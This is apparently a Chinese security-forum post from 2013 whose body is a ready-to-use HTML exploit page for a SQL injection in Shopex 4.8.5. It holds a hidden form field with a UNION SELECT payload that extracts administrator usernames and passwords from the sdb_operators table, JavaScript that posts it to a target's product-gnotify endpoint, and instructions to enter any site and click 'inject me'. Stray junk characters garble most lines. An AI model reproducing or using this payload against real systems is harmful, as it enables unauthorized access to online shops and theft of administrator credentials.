<center>2 i. d9 p8 {. F x( S3 w
<title>中国网络渗透测评联盟-中测联盟|-Shopex 4.8.5 SQL Injection Exp 在线版</title>
7 \! G- O/ f' I/ _# s( C( H<form action="" method="post" name="submit_url">; y0 |7 z" w# D* b
网址:<input type=text name=url value="http://www.political-security.com/" size=62><br><br>/ b2 v7 x9 [0 \+ J9 _
<input type="hidden" name="goods[goods_id]" value="3">0 ?3 e8 Q7 [! |; b, o7 k: @' S
<input type="hidden" name="goods[product_id]" value="1 and 1=2 union select 1,2,3,4,5,6,7,8,concat(0x245E,username,0x2D3E,userpass,0x5E24),10,11,12,13,14,15,16,17,18,19,20,21,22 from sdb_operators">6 S% V4 d) C1 ?3 J
<input type="submit" value="给我注入" onclick=fsubmit()>- L' b" R* A5 @1 Y& `" b7 Y
</form> <br /><br />填上你要注入的网址(注意要打上http:// 要不跳转不了) 点“给我注入”就要以了。//www.political-security.com$ d7 n5 u$ F5 r' z7 ^& q$ K
+ [3 j c8 ?* x- e _3 s0 s/ J
<script>
4 K$ m8 w" a: }1 ?/ q0 N5 y& Pfunction fsubmit(){
* x0 a( s( d2 e4 Hform = document.forms[0];
; a, c& m, b& O; C/ H' ^form.action = form.url.value+'/?product-gnotify'; % e: S9 |+ E* c5 e! ^
form.submit();
1 o* r. W- _; ^9 }8 V4 y}
$ U3 K1 E8 ^1 M1 s: c8 M# C</script>
9 d, d; G7 w' d( u3 \/ v; i |
发表于 2013-1-23 09:20:52
收藏
支持
反对